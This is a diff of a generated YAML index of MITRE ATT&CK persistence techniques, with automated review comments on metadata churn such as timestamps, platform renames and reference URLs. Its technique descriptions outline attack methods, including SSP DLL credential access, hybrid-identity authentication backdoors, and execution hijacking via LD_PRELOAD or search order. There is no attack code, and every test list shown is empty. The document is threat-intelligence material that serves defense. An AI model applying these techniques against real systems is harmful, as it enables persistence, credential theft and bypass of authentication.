- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
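Review bot: the `x_mitre_detection` text re-emitted for T1137.005 in this hunk still reads `PRPR_RULE_MSG_NAME` alongside `PR_RULE_MSG_PROVIDER`; both MAPI property names carry the single `PR_` prefix, so the doubled `PRPR_` is a typo inherited from the upstream ATT&CK description. Since this index is regenerated from upstream data (the whole technique block is being re-serialized in a new key order here), the correction belongs upstream rather than in this file, otherwise the next regeneration will reinstate it. The newly added T1098.007 block ends with `x_mitre_detection: ''` and `atomic_tests: []`, which matches how other test-less techniques (T1137.005 just above it) are carried in this index, so no action is needed there.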
@@ -29386,7 +29820,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
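Review bot: the `modified` value for T1546.011 moves backwards in this hunk, from `2022-04-25T14:00:00.188Z` to `2020-11-10T18:29:31.094Z`, and the same backwards move recurs below for T1037.002, T1205, T1525, T1547.005, T1543.004, T1546.005, T1574.006, T1546.012, T1574.005, T1546.008 and T1542.002. The old values share the `14:00:00.188Z` suffix of a release-wide bulk stamp while the new ones look like per-object edit times, so the generator appears to be reading a different upstream bundle than it did before; confirm that is intentional, and that nothing downstream uses `modified` to detect changed techniques, since such a consumer would now see an older date on content whose `name` and `description` are unchanged.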
@@ -29441,13 +29875,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29508,9 +29940,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -29519,7 +29951,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -29572,7 +30003,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29593,12 +30024,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -29682,11 +30112,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29699,7 +30128,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -29712,7 +30140,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -29742,7 +30169,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -29774,7 +30202,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -29796,8 +30224,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -29823,7 +30249,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -29849,36 +30275,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -29886,9 +30310,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -29897,21 +30321,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
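Review bot: the platform rewrite for T1556.007 in this hunk replaces `Azure AD`, `Google Workspace` and `Office 365` with `Office Suite` and `Identity Provider` (the T1078.001 hunk further down does the same). Any per-platform index keyed on the old platform strings will silently drop these techniques unless it is regenerated in the same change, so please check that the platform-specific index files are updated alongside this one. The contributor, domain and deprecation keys relocated in this hunk keep their values, which leaves the version bump from `'1.0'` to `'1.1'` as the only substantive metadata change here.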
@@ -29951,13 +30376,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
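Review bot: the T1543.004 description context in this hunk has `/System/Library/LaunchDaemons/`, `/Library/LaunchDaemons/`, `Label`, `Program` and `RunAtLoad` each broken onto its own line with a stray leading `.` or `and` on the line that follows; the same artefact appears in the T1546.005 (`trap`, `ctrl+c`, `ctrl+d`) and T1546.012 (`C:\dbg\ntsd.exe -g notepad.exe`) context further down. These are unchanged context lines, so the patch does not introduce the problem, but it suggests inline code markup is being stripped with a newline left behind during export and is worth a follow-up in the generator.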
@@ -30034,12 +30456,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30058,6 +30479,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30065,7 +30487,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30085,29 +30506,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
@@ -30184,12 +30607,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30204,6 +30626,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30212,18 +30635,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -30255,9 +30678,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30329,7 +30749,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30356,7 +30775,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -30382,13 +30801,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -30509,7 +30926,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -30581,7 +30997,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -30651,7 +31066,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -30761,7 +31175,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -30815,7 +31228,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -30848,8 +31261,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -30880,7 +31291,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -30915,12 +31326,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -30997,7 +31406,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31051,7 +31459,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31083,7 +31490,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31113,55 +31520,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
